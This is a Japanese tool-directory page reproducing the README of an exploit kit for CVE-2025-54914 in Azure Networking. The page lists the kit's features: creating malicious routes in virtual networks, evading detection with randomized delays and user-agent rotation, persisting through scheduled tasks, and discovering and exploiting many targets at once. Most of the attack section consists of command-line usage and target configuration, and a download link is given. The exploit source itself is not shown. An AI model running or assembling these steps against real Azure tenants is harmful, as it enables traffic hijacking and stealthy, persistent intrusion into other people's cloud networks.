Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-54914-PoC — CVE-2025-54914 の Azure Networking におけるエクスプロイト。悪意のあるルートを作成し、回避、永続化、複数ターゲットのスキャン、および認可されたセキュリティテストのためのレポート機能を備えています。 | Kitploit
ツール/GitHubGitHub/ash1996x/cve-2025-54914-poc
偵察永続化メカニズム脆弱性分析エクスプロイトIDS/IPS回避ペネトレーションテストクラウドセキュリティ
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

CVE-2025-54914 の Azure Networking におけるエクスプロイト。悪意のあるルートを作成し、回避、永続化、複数ターゲットのスキャン、および認可されたセキュリティテストのためのレポート機能を備えています。

リポジトリを見る
44250年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-54914 Azure Route Exploit

概要

これは、CVE-2025-54914 Azure Networking Route エクスプロイトの改良版です。このバージョンは、コアとなる CVE の機能を維持しつつ、永続化、回避、マルチターゲットスキャン、エラーハンドリングなどの追加機能を備えています。

機能

コア CVE 機能

  • ルート作成: Azure 仮想ネットワークに悪意のあるルートを作成します
  • ルート削除: 作成したルートをクリーンアップのために削除します
  • API 互換性: Azure Management API 2025-09-01 で動作します
  • 認証: Azure CLI および手動トークン認証をサポートします

機能

  • 回避テクニック: ランダムな遅延、ユーザーエージェントのローテーション、リクエストの難読化
  • 永続化: スケジュールタスクの作成、継続的監視モード
  • マルチターゲットスキャン: 複数ターゲットの同時スキャンとエクスプロイト
  • 包括的なレポート: 成功/失敗分析を含む詳細なレポート
  • エラーハンドリング: グレースフルな障害処理と復旧
  • 設定管理: JSON ベースのターゲット設定
  • ターゲット発見: 脆弱なリソースの自動発見
  • リスク評価: 脆弱性分析とリスクスコアリング

インストール

前提条件

root@kitploit:~
# Install Python dependencies
pip install requests

# Install Azure CLI (for authentication)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

セットアップ

root@kitploit:~
# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py

# Authenticate with Azure
az login

使用方法

基本的な使い方

単一ターゲットのエクスプロイト

root@kitploit:~
# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

マルチターゲットエクスプロイト

root@kitploit:~
# Create configuration file
python exploit_utils.py discover --output targets.json

# Exploit all targets
python exploit.py --targets-file targets.json --operation create

スキャンモード

root@kitploit:~
# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only

永続化モード

root@kitploit:~
# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30

高度な使い方

回避とステルス

root@kitploit:~
# Custom delay ranges for evasion
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

ドライランモード

root@kitploit:~
# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run

詳細ログ出力

root@kitploit:~
# Enable debug logging
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

設定

ターゲット設定フォーマット

root@kitploit:~
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

環境変数

root@kitploit:~
# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Log level
export LOG_LEVEL="INFO"

ユーティリティスクリプト

ターゲット発見

root@kitploit:~
# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json

# Discover specific subscriptions
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

設定生成

root@kitploit:~
# Generate exploit configuration from discovered targets
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

脆弱性分析

root@kitploit:~
# Analyze targets for risk assessment
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

セキュリティ機能

回避テクニック

  • リクエストタイミング: リクエスト間のランダムな遅延
  • ユーザーエージェントのローテーション: 複数のブラウザユーザーエージェント
  • ヘッダー難読化: 現実的な HTTP ヘッダー
  • SSL 検証: 適切な証明書検証

永続化メカニズム

  • スケジュールタスク: Windows スケジュールタスクの作成
  • 継続モード: 長時間実行の永続化
  • セッション管理: 実行間の状態保持
  • 設定の永続化: 設定をディスクに保存

エラーハンドリング

  • グレースフルデグラデーション: 個別の失敗でも処理を継続
  • タイムアウト保護: ハングアップするリクエストを防止
  • シグナル処理: 割り込み時のクリーンなシャットダウン
  • リソースクリーンアップ: 終了時の自動クリーンアップ

レポート

エクスプロイトレポート

  • 操作結果: 各ターゲットの成功/失敗
  • タイミング情報: 実行タイムスタンプ
  • エラーの詳細: 詳細なエラーメッセージ
  • サマリー統計: 全体の成功率

発見レポート

  • ターゲットインベントリ: 発見されたリソースの完全なリスト
  • サブスクリプション別内訳: サブスクリプションごとにグループ化されたターゲット
  • リソースの詳細: VNet、サブネット、およびロケーション情報

脆弱性分析

  • リスク評価: 高/中/低リスクの分類
  • 本番環境の指標: 本番環境の識別
  • タグ分析: リソースタグに基づくリスクスコアリング

ベストプラクティス

運用セキュリティ

  1. ドライランを使用: 最初に必ず --dry-run でテストする
  2. 範囲を制限: 非本番環境から開始する
  3. ログを監視: 予期しない動作がないかログを確認する
  4. クリーンアップ: テスト後に作成したルートを削除する

パフォーマンス最適化

  1. ワーカー制限: システム容量に応じて --max-workers を調整する
  2. 遅延チューニング: 遅延設定でステルス性と速度のバランスを取る
  3. バッチ処理: 大規模運用にはターゲットファイルを使用する
  4. リソース監視: 実行中はシステムリソースを監視する

エラー復旧

  1. ログを確認: トラブルシューティングのためにエラーメッセージを確認する
  2. 権限を確認: 適切な Azure 権限があることを確認する
  3. ネットワーク接続: インターネット接続を確認する
  4. トークンの有効性: Azure CLI の認証状態を確認する

トラブルシューティング

よくある問題

認証エラー

root@kitploit:~
# Re-authenticate with Azure
az login

# Check current account
az account show

# List accessible subscriptions
az account list

権限エラー

root@kitploit:~
# Check required permissions
az role assignment list --assignee $(az account show --query user.name -o tsv)

ネットワークエラー

root@kitploit:~
# Test connectivity
curl -I https://management.azure.com

# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY

デバッグモード

root@kitploit:~
# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log

# Check log file
tail -f debug.log

法的および倫理的な考慮事項

⚠️ 重要: このツールは許可されたセキュリティテスト専用です。

  • 許可が必要: 自分が所有している、または明示的にテストを許可されたシステムでのみ使用してください
  • 法令遵守: 地域の法律および規制に準拠していることを確認してください
  • 責任ある開示: 脆弱性は適切なチャネルを通じて報告してください
  • 教育目的: このツールは教育および研究目的を意図しています

ライセンス

このプロジェクトは研究および教育目的でのみライセンスされています。商用利用には明示的な許可が必要です。

コントリビューション

  1. リポジトリをフォークする
  2. フィーチャーブランチを作成する
  3. 変更を加える
  4. 該当する場合はテストを追加する
  5. プルリクエストを送信する

サポート

問題や質問がある場合:

  1. トラブルシューティングセクションを確認する
  2. エラーの詳細についてログを確認する
  3. 詳細な情報を添えて Issue を作成する
  4. 関連する設定とエラーメッセージを含める
ツールをダウンロード